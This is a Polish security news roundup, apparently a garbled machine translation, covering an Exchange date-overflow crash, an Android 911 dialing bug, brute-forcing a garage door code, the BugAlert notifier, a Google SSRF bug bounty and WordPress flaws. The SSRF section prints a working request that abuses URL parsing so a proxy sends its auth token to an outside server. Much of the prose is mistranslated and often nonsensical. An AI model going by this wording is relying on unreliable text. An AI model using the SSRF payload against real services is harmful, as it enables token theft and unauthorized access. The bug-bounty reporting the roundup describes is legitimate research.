W tym tygodniu Bezpieczeństwo: Y2K22, nieumyślnie BLOCKING 911, jak również ALERT BUG

Jeśli miał nieszczęście uruchomiony serwer Microsoft Exchange w ubiegłym tygodniu, wtedy nie wymóg mi powiedzieć o problemie Y2K22 , Do reszty catch nas do góry, gdy wymiana próbuje pobrać pierwszy malware definicje aktualizację 2022, numer wersji z nowymi definicjami spowodowała wypadek w silniku wykrywania złośliwego oprogramowania. Data jest reprezentowany jako ciąg 2201010001, gdzie dwie pierwsze cyfry oznaczają bardzo roku. Ciąg ten zostanie przekonwertowany do podpisanej długiej liczby całkowitej, która maxes się na 2,147,483,647. Liczba całkowita przepływa, jak wynik jest zdefiniowana zachowanie awarii silnika. Serwer przestaje bezpieczną pracę, nie każdy rodzaj przetwarzania wiadomości bez pracującego silnika malware, co oznacza, że nie dostaje e-mail za pośrednictwem. zadowolony nowy rok!

Android 911 Denial of Service

Wybieranie 911 dla służb ratowniczych jest dość dużo najgorszy czas dla błędu aplikacji, aby objawiać. Google po prostu stałą taką błąd w aktualizacji ze stycznia Android. To jedna z tych dziwnych niezamierzonych oddziaływań APP – w tej sytuacji zespoły Microsoft wyzwalanie Android błąd. Jeśli jest zainstalowana aplikacja drużyny, jednak nie bierze zalogowany, produkuje zespoły jak rejestrów nowy przedmiot PhoneAccount na każdym uruchomieniu. Wydaje się, że powinno być rzadkie, jednak zespoły na Androida jest również znany wylogowaniu indywidualna spontanicznie. Podczas wybierania 911, Android uruchamia procedurę w celu określenia, które PhoneAccount powinny być wykorzystane do ścieżki połączenia, jak również rozwiązuje więzy porównując skrótów. Porównanie to jest po prostu naiwny odejmowanie, co oznacza, że istnieje 50% możliwość na uzyskanie niekorzystnego wyniku. Było to niespodziewane, co prowadzi do katastrofy.

Garage Door Inżynieria odwrotna

Inżynieria odwrotna 30-letni bezprzewodowy Plan pozwolenie nie może być feat najbardziej przyciągające zainteresowanie, jednak w niektórych przypadkach podróż jest nagrodą samą w sobie. [Maxwell Dulin] przynosi nam historię, jak również ta podróż jest zdecydowanie warto. Podstawy tej siekać pewnością są nadal opłacalne, począwszy przyjrzeniu sprzętu. Brama garażowa jest zsynchronizowany do otwierania drzwi garażowych trzymając przycisk na odbiorniku podczas wysyłania kodu. środka otwierającego jest dziewięć przełączniki, każdy z trzech położeń. Co oni robią? Wyciągnął niezawodne SDR dostać ruchu w sieci, a także spróbować zdekodować sygnały. Inspectrum jak GNU Radio było tu bohaterowie, zapewniając wgląd tego prostego systemu uwierzytelniającego. Ostateczna myśl o tej rzeczywistej bramy garażowej? Można brute force nieznanego kodu poprzez wysłanie wszystkich możliwych kombi, a także zajmuje tylko 104 minut.

BugAlert

Jeśli jesteś sysadmin, można zrozumieć, że pewne kwestie telefon do natychmiastowego działania. Jeśli zabrakło serwerów Java, luka Log4J był test zakończy swojego protokołu reakcji. czas pomiędzy publicznym ujawnieniem, a także, kiedy tylko usłyszał o nim, może być wystarczające, aby wyruszył katastrofy. Chociaż istnieją liczne usługi raportowania błędów, jak również ramy, raczej nic nie pasuje to nisza wykorzystują sprawę: powiadomieniem jak najszybciej, że twoje włosy mogą być naprawdę w ogniu. Że niewypełniona nisza podsłuchu [Matthew Sullivan], która ujawniła nowy projekt, Bug Alert. To wszystko jest open source, więc można trzymać własną instancję, jeśli naprawdę chcesz. Można zdecydować się dostać tweeta, tekst, a nawet telefon. Ma to potencjalny być pomocnym narzędziem, spójrz!

Czuję, że wymóg złożenia Bug Alarm wyłączenia określonego dziwne piosenki Al …

Zombie SSRF

[David Schütz] szukał niejasnych Google API, a także znaleźć jobs.googleapis.com, które można demo siebie. Że demo jest interesująca, ponieważ nie jest usługą całkowicie uregulowana-out, jednak mówi do prawdziwego back-end. Wnioski iść z prokurentem, cxl-services.appspot.com, który obsługuje etap uwierzytelniania na stronie demo. Jeśli może wyruszył fałszerstwem żądania Server-Side (SSRF), może on być w stanie dostać się na uwierzytelnionych wniosków, a także być może technika pełnomocnik do wysyłania ruchu internetowego w jego imieniu. URL parsowanie jest trudne. Technika, który pracował? Odwrotny ukośnik w adresie URL. get /proxy?url=https://sfmnev.vps.xdavidhu.me\@jobs.googleapis.com/ HTTP / 1.1

Z dostępem do wzmocnienia żeton w dłoni, [David] zaczął dokładnie sprawdź inne API Google, aby zobaczyć, co to mu żeton warunkiem uzyskania dostępu do celu. zapewnia mu się przestrzegając omówiliśmy wcześniej, być ostrożnym dokładnie, jak daleko można przesunąć. Mógł zgłosił błąd, najlepiej z dala jednak chciał sprawdzić, czy on naprawdę miał dostęp online do wzmocnienia Token. Po potwierdzeniu token pomógł wyrejestrowany dostępu, odwrócił się w stwierdzeniu, jak również kompensowane bardzo dobre $ +3.133,70, oprócz dodatkowy $ 1000 za wielkiego raportu, a także ostrożne spojrzenie na ruch boczny. To wszystko, co tam jest, prawda? Nie. tuż przed przeszedł termin ujawnienie 90 dni, [David] znalazłem obejście naprawy. dodatNg dowolny typ tekstu między ukośnikiem odwrotnym, a także @ był wystarczający, aby go złamać. jeszcze jeden 313,70 $. Tylko dla zabawy, sondował stare adresy URL, które nie powinno być w służbie po naprawie. Tak, odkrył jeszcze jeden token bezpieczeństwa i bezpieczeństwa, a także netted 3133,70 $. Ten SSRF zombie nadal nie jest martwy, o czym świadczy na Twitterze:

Aktualizacja WordPress.

Jeśli nie ustawisz instancji WordPress do aktualizacji automatycznie, nadszedł czas, aby przejść do najnowszej wersji. Istnieją tu cztery potencjalnie szkodliwe problemy, choć szczegóły są w tym momencie rzadkie. Bardzo pierwsza jest luka skryptowcowa w opublikowaniu ślimaków, części adresu URL pasujące do nazwy publikowania. Drugi omawiany problem jest wstrzyknięciem elementu w niektórych wielokogierowanych konfiguracjach. Ostatnią dwoma lukami to zastrzyki SQL, na pewno zasługują na “rok to?” ja ja.